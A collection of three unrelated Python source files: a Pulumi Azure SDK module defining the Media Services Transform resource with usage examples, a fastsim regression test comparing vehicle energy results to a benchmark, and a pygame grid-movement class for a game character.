            resource_group_name=example_resource_group.name,
            media_services_account_name=example_service_account.name,
            description="My transform description",
            outputs=[azure.media.TransformOutputArgs(
                relative_priority="Normal",
                on_error_action="ContinueJob",
                builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
                    preset_name="AACGoodQualityAudio",
                ),
            )])
        ```
        ### With Multiple Outputs

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="GRS")
        example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
                id=example_account.id,
                is_primary=True,
            )])
        example_transform = azure.media.Transform("exampleTransform",
            resource_group_name=example_resource_group.name,
            media_services_account_name=example_service_account.name,
            description="My transform description",
            outputs=[
                azure.media.TransformOutputArgs(
                    relative_priority="Normal",
                    on_error_action="ContinueJob",
                    builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
                        preset_name="AACGoodQualityAudio",
                    ),
                ),
                azure.media.TransformOutputArgs(
                    relative_priority="Low",
                    on_error_action="ContinueJob",
                    audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs(
                        audio_language="en-US",
                        audio_analysis_mode="Basic",
                    ),
                ),
                azure.media.TransformOutputArgs(
                    relative_priority="Low",
                    on_error_action="StopProcessingJob",
                    face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs(
                        analysis_resolution="StandardDefinition",
                    ),
                ),
            ])
        ```

        ## Import

        Transforms can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1
        ```

        :param str resource_name: The name of the resource.
        :param TransformArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the (args=TransformArgs) and keyword-argument call forms.
        resource_args, opts = _utilities.get_resource_args_opts(TransformArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 media_services_account_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: build the props bag and validate the
            # required fields (unless the resource is being looked up by URN).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = TransformArgs.__new__(TransformArgs)

            __props__.__dict__["description"] = description
            if media_services_account_name is None and not opts.urn:
                raise TypeError("Missing required property 'media_services_account_name'")
            __props__.__dict__["media_services_account_name"] = media_services_account_name
            __props__.__dict__["name"] = name
            __props__.__dict__["outputs"] = outputs
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
        super(Transform, __self__).__init__(
            'azure:media/transform:Transform',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            description: Optional[pulumi.Input[str]] = None,
            media_services_account_name: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None) -> 'Transform':
        """
        Get an existing Transform resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: An optional verbose description of the Transform.
        :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
        :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        # Populate a state bag directly; pulumi resolves actual values from the provider.
        __props__ = _TransformState.__new__(_TransformState)

        __props__.__dict__["description"] = description
        __props__.__dict__["media_services_account_name"] = media_services_account_name
        __props__.__dict__["name"] = name
        __props__.__dict__["outputs"] = outputs
        __props__.__dict__["resource_group_name"] = resource_group_name
        return Transform(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        An optional verbose description of the Transform.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter(name="mediaServicesAccountName")
    def media_services_account_name(self) -> pulumi.Output[str]:
        """
        The Media Services account name. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "media_services_account_name")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name which should be used for this Transform. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def outputs(self) -> pulumi.Output[Optional[Sequence['outputs.TransformOutput']]]:
        """
        One or more `output` blocks as defined below. At least one `output` must be defined.
        """
        return pulumi.get(self, "outputs")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "resource_group_name")
sdk/python/pulumi_azure/media/transform.py
import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . import outputs from ._inputs import * __all__ = ['TransformArgs', 'Transform'] @pulumi.input_type class TransformArgs: def __init__(__self__, *, media_services_account_name: pulumi.Input[str], resource_group_name: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None): """ The set of arguments for constructing a Transform resource. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. """ pulumi.set(__self__, "media_services_account_name", media_services_account_name) pulumi.set(__self__, "resource_group_name", resource_group_name) if description is not None: pulumi.set(__self__, "description", description) if name is not None: pulumi.set(__self__, "name", name) if outputs is not None: pulumi.set(__self__, "outputs", outputs) @property @pulumi.getter(name="mediaServicesAccountName") def media_services_account_name(self) -> pulumi.Input[str]: """ The Media Services account name. Changing this forces a new Transform to be created. 
""" return pulumi.get(self, "media_services_account_name") @media_services_account_name.setter def media_services_account_name(self, value: pulumi.Input[str]): pulumi.set(self, "media_services_account_name", value) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Input[str]: """ The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: pulumi.Input[str]): pulumi.set(self, "resource_group_name", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ An optional verbose description of the Transform. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name which should be used for this Transform. Changing this forces a new Transform to be created. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]: """ One or more `output` blocks as defined below. At least one `output` must be defined. 
""" return pulumi.get(self, "outputs") @outputs.setter def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]): pulumi.set(self, "outputs", value) @pulumi.input_type class _TransformState: def __init__(__self__, *, description: Optional[pulumi.Input[str]] = None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering Transform resources. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ if description is not None: pulumi.set(__self__, "description", description) if media_services_account_name is not None: pulumi.set(__self__, "media_services_account_name", media_services_account_name) if name is not None: pulumi.set(__self__, "name", name) if outputs is not None: pulumi.set(__self__, "outputs", outputs) if resource_group_name is not None: pulumi.set(__self__, "resource_group_name", resource_group_name) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ An optional verbose description of the Transform. 
""" return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="mediaServicesAccountName") def media_services_account_name(self) -> Optional[pulumi.Input[str]]: """ The Media Services account name. Changing this forces a new Transform to be created. """ return pulumi.get(self, "media_services_account_name") @media_services_account_name.setter def media_services_account_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "media_services_account_name", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name which should be used for this Transform. Changing this forces a new Transform to be created. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]: """ One or more `output` blocks as defined below. At least one `output` must be defined. """ return pulumi.get(self, "outputs") @outputs.setter def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]): pulumi.set(self, "outputs", value) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> Optional[pulumi.Input[str]]: """ The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. 
""" return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "resource_group_name", value) class Transform(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, __props__=None): """ Manages a Transform. ## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), )]) ``` ### With Multiple Outputs ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", 
resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[ azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="ContinueJob", audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs( audio_language="en-US", audio_analysis_mode="Basic", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="StopProcessingJob", face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs( analysis_resolution="StandardDefinition", ), ), ]) ``` ## Import Transforms can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] name: The name which should be used for this Transform. 
Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ ... @overload def __init__(__self__, resource_name: str, args: TransformArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Manages a Transform. ## Example Usage ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), )]) ``` ### With Multiple Outputs ```python import pulumi import pulumi_azure as azure example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe") example_account = azure.storage.Account("exampleAccount", resource_group_name=example_resource_group.name, location=example_resource_group.location, account_tier="Standard", account_replication_type="GRS") 
example_service_account = azure.media.ServiceAccount("exampleServiceAccount", location=example_resource_group.location, resource_group_name=example_resource_group.name, storage_accounts=[azure.media.ServiceAccountStorageAccountArgs( id=example_account.id, is_primary=True, )]) example_transform = azure.media.Transform("exampleTransform", resource_group_name=example_resource_group.name, media_services_account_name=example_service_account.name, description="My transform description", outputs=[ azure.media.TransformOutputArgs( relative_priority="Normal", on_error_action="ContinueJob", builtin_preset=azure.media.TransformOutputBuiltinPresetArgs( preset_name="AACGoodQualityAudio", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="ContinueJob", audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs( audio_language="en-US", audio_analysis_mode="Basic", ), ), azure.media.TransformOutputArgs( relative_priority="Low", on_error_action="StopProcessingJob", face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs( analysis_resolution="StandardDefinition", ), ), ]) ``` ## Import Transforms can be imported using the `resource id`, e.g. ```sh $ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1 ``` :param str resource_name: The name of the resource. :param TransformArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... 
def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(TransformArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = TransformArgs.__new__(TransformArgs) __props__.__dict__["description"] = description if media_services_account_name is None and not opts.urn: raise TypeError("Missing required property 'media_services_account_name'") __props__.__dict__["media_services_account_name"] = media_services_account_name __props__.__dict__["name"] = name __props__.__dict__["outputs"] = outputs if resource_group_name is None and not opts.urn: raise TypeError("Missing required property 'resource_group_name'") __props__.__dict__["resource_group_name"] = resource_group_name super(Transform, __self__).__init__( 'azure:media/transform:Transform', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = 
None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None) -> 'Transform': """ Get an existing Transform resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _TransformState.__new__(_TransformState) __props__.__dict__["description"] = description __props__.__dict__["media_services_account_name"] = media_services_account_name __props__.__dict__["name"] = name __props__.__dict__["outputs"] = outputs __props__.__dict__["resource_group_name"] = resource_group_name return Transform(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def description(self) -> pulumi.Output[Optional[str]]: """ An optional verbose description of the Transform. 
""" return pulumi.get(self, "description") @property @pulumi.getter(name="mediaServicesAccountName") def media_services_account_name(self) -> pulumi.Output[str]: """ The Media Services account name. Changing this forces a new Transform to be created. """ return pulumi.get(self, "media_services_account_name") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name which should be used for this Transform. Changing this forces a new Transform to be created. """ return pulumi.get(self, "name") @property @pulumi.getter def outputs(self) -> pulumi.Output[Optional[Sequence['outputs.TransformOutput']]]: """ One or more `output` blocks as defined below. At least one `output` must be defined. """ return pulumi.get(self, "outputs") @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Output[str]: """ The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ return pulumi.get(self, "resource_group_name")
0.85753
0.095307
import pandas as pd import time import numpy as np import re import os import sys import inspect from pathlib import Path # local modules from fastsim import simdrive, vehicle, cycle def main(use_jitclass=True, err_tol=1e-4): """Runs test test for 26 vehicles and 3 cycles. Test compares cumulative positive and negative energy values to a benchmark from earlier. Arguments: ---------- use_jitclass : use numba or not, default True err_tol : error tolerance default of 1e-4 was selected to prevent minor errors from showing. As of 31 December 2020, a recent python update caused errors that are smaller than this and therefore ok to neglect. """ t0 = time.time() cycles = ['udds', 'hwfet', 'us06'] vehicles = np.arange(1, 27) print('Instantiating classes.') print() veh = vehicle.Vehicle(1) if use_jitclass: veh_jit = veh.get_numba_veh() cyc = cycle.Cycle('udds') if use_jitclass: cyc_jit = cyc.get_numba_cyc() energyAuditErrors = [] iter = 0 for vehno in vehicles: print('vehno =', vehno) for cycname in cycles: if not((vehno == 1) and (cycname == 'udds')): cyc.set_standard_cycle(cycname) if use_jitclass: cyc_jit = cyc.get_numba_cyc() veh.load_veh(vehno) if use_jitclass: veh_jit = veh.get_numba_veh() if use_jitclass: sim_drive = simdrive.SimDriveJit(cyc_jit, veh_jit) sim_drive.sim_drive() else: sim_drive = simdrive.SimDriveClassic(cyc, veh) sim_drive.sim_drive() sim_drive_post = simdrive.SimDrivePost(sim_drive) # sim_drive_post.set_battery_wear() diagno = sim_drive_post.get_diagnostics() energyAuditErrors.append(sim_drive.energyAuditError) if iter == 0: dict_diag = {} dict_diag['vnum'] = [vehno] dict_diag['cycle'] = [cycname] for key in diagno.keys(): dict_diag[key] = [diagno[key]] iter += 1 else: dict_diag['vnum'].append(vehno) dict_diag['cycle'].append(cycname) for key in diagno.keys(): dict_diag[key].append(diagno[key]) df = pd.DataFrame.from_dict(dict_diag) t1 = time.time() print() print('Elapsed time: ', round(t1 - t0, 2), 's') df0 = 
pd.read_csv(Path(simdrive.__file__).parent.resolve() / 'resources/master_benchmark_vars.csv') # make sure both dataframes have the same columns new_cols = {col for col in df.columns} - {col for col in df0.columns} df.drop(columns=new_cols, inplace=True) old_cols = {col for col in df0.columns} - {col for col in df.columns} df0.drop(columns=old_cols, inplace=True) from math import isclose df_err = df.copy() abs_err = [] for idx in df.index: for col in df.columns[2:]: if not(isclose(df.loc[idx, col], df0.loc[idx, col], rel_tol=err_tol, abs_tol=err_tol)): df_err.loc[idx, col] = (df.loc[idx, col] - df0.loc[idx, col]) / df0.loc[idx, col] abs_err.append(np.abs(df_err.loc[idx, col])) print(str(round(df_err.loc[idx, col] * 100, 5)) + '% for') print('New Value: ' + str(round(df.loc[idx, col], 15))) print('vnum = ' + str(df.loc[idx, 'vnum'])) print('cycle = ' + str(df.loc[idx, 'cycle'])) print('idx =', idx, ', col =', col) print() else: df_err.loc[idx, col] = 0 abs_err = np.array(abs_err) if len(abs_err) > 0: print('\nmax error =', str(round(abs_err.max() * 100, 4)) + '%') else: print(f'No errors exceed the {err_tol:.3g} tolerance threshold.') if __name__ == "__main__": if len(sys.argv) > 1: if re.match('(?i)true', sys.argv[1]): use_jitclass = True print('Using numba JIT compilation.') else: use_jitclass = False print('Skipping numba JIT compilation.') if len(sys.argv) > 2: err_tol = float(sys.argv[2]) print(f"Using error tolerance of {err_tol:.3g}.") else: err_tol = list(inspect.signature(main).parameters.values())[1].default print(f"Using error default tolerance of {err_tol:.3g}.") main(use_jitclass=use_jitclass, err_tol=err_tol) else: print('Using numba JIT compilation.') main()
fastsim-2021a/fastsim/tests/test26veh3cyc.py
import pandas as pd import time import numpy as np import re import os import sys import inspect from pathlib import Path # local modules from fastsim import simdrive, vehicle, cycle def main(use_jitclass=True, err_tol=1e-4): """Runs test test for 26 vehicles and 3 cycles. Test compares cumulative positive and negative energy values to a benchmark from earlier. Arguments: ---------- use_jitclass : use numba or not, default True err_tol : error tolerance default of 1e-4 was selected to prevent minor errors from showing. As of 31 December 2020, a recent python update caused errors that are smaller than this and therefore ok to neglect. """ t0 = time.time() cycles = ['udds', 'hwfet', 'us06'] vehicles = np.arange(1, 27) print('Instantiating classes.') print() veh = vehicle.Vehicle(1) if use_jitclass: veh_jit = veh.get_numba_veh() cyc = cycle.Cycle('udds') if use_jitclass: cyc_jit = cyc.get_numba_cyc() energyAuditErrors = [] iter = 0 for vehno in vehicles: print('vehno =', vehno) for cycname in cycles: if not((vehno == 1) and (cycname == 'udds')): cyc.set_standard_cycle(cycname) if use_jitclass: cyc_jit = cyc.get_numba_cyc() veh.load_veh(vehno) if use_jitclass: veh_jit = veh.get_numba_veh() if use_jitclass: sim_drive = simdrive.SimDriveJit(cyc_jit, veh_jit) sim_drive.sim_drive() else: sim_drive = simdrive.SimDriveClassic(cyc, veh) sim_drive.sim_drive() sim_drive_post = simdrive.SimDrivePost(sim_drive) # sim_drive_post.set_battery_wear() diagno = sim_drive_post.get_diagnostics() energyAuditErrors.append(sim_drive.energyAuditError) if iter == 0: dict_diag = {} dict_diag['vnum'] = [vehno] dict_diag['cycle'] = [cycname] for key in diagno.keys(): dict_diag[key] = [diagno[key]] iter += 1 else: dict_diag['vnum'].append(vehno) dict_diag['cycle'].append(cycname) for key in diagno.keys(): dict_diag[key].append(diagno[key]) df = pd.DataFrame.from_dict(dict_diag) t1 = time.time() print() print('Elapsed time: ', round(t1 - t0, 2), 's') df0 = 
pd.read_csv(Path(simdrive.__file__).parent.resolve() / 'resources/master_benchmark_vars.csv') # make sure both dataframes have the same columns new_cols = {col for col in df.columns} - {col for col in df0.columns} df.drop(columns=new_cols, inplace=True) old_cols = {col for col in df0.columns} - {col for col in df.columns} df0.drop(columns=old_cols, inplace=True) from math import isclose df_err = df.copy() abs_err = [] for idx in df.index: for col in df.columns[2:]: if not(isclose(df.loc[idx, col], df0.loc[idx, col], rel_tol=err_tol, abs_tol=err_tol)): df_err.loc[idx, col] = (df.loc[idx, col] - df0.loc[idx, col]) / df0.loc[idx, col] abs_err.append(np.abs(df_err.loc[idx, col])) print(str(round(df_err.loc[idx, col] * 100, 5)) + '% for') print('New Value: ' + str(round(df.loc[idx, col], 15))) print('vnum = ' + str(df.loc[idx, 'vnum'])) print('cycle = ' + str(df.loc[idx, 'cycle'])) print('idx =', idx, ', col =', col) print() else: df_err.loc[idx, col] = 0 abs_err = np.array(abs_err) if len(abs_err) > 0: print('\nmax error =', str(round(abs_err.max() * 100, 4)) + '%') else: print(f'No errors exceed the {err_tol:.3g} tolerance threshold.') if __name__ == "__main__": if len(sys.argv) > 1: if re.match('(?i)true', sys.argv[1]): use_jitclass = True print('Using numba JIT compilation.') else: use_jitclass = False print('Skipping numba JIT compilation.') if len(sys.argv) > 2: err_tol = float(sys.argv[2]) print(f"Using error tolerance of {err_tol:.3g}.") else: err_tol = list(inspect.signature(main).parameters.values())[1].default print(f"Using error default tolerance of {err_tol:.3g}.") main(use_jitclass=use_jitclass, err_tol=err_tol) else: print('Using numba JIT compilation.') main()
0.313735
0.341912
import pygame from ..base import Manual from ...enums import Effects class ManualSquare(Manual): inputs = { 'up': pygame.key.key_code('Z'), 'left': pygame.key.key_code('Q'), 'down': pygame.key.key_code('S'), 'right': pygame.key.key_code('D'), } def run_one_step(self, key) -> None: if not key: return if key == self.inputs['up']: # Go up self.move_character(0) elif key == self.inputs['left']: # Go left self.move_character(1) elif key == self.inputs['down']: # Go down self.move_character(2) elif key == self.inputs['right']: # Go right self.move_character(3) def move_character(self, direction: int, amount: int = 1) -> None: """ Changes the position of the character by `amount` cell(s) on a squared grid. :param int direction: Direction the character should move to. Mapping: 0: up 1: left 2: down 3: right :param int amount: How many cells it will try to move. Default is 1. """ if direction not in range(4): raise ValueError(f'Invalid direction {direction!r}, should be an integer between 0 and 3 included.') new_x, new_y = self.character.location for _ in range(amount): if direction == 0: new_y -= 1 elif direction == 1: new_x -= 1 elif direction == 2: new_y += 1 elif direction == 3: new_x += 1 # Check if new coords are in the available space max_x, max_y = self.level.content.shape if 0 <= new_x < max_x and 0 <= new_y < max_y: # Get the object which is on our path next_step_cell_object_id = self.level.content[new_x, new_y] next_step_cell_object = self.objects[next_step_cell_object_id - 1] if next_step_cell_object.traversable: self.character.move_and_handle_object_effect(new_x, new_y, next_step_cell_object) if next_step_cell_object.effect == Effects.LEVEL_FINISH: self._running = False # If the character is dead, end. if not self.character.is_alive(): self._running = False
leveltwo/algorithm/square/manual.py
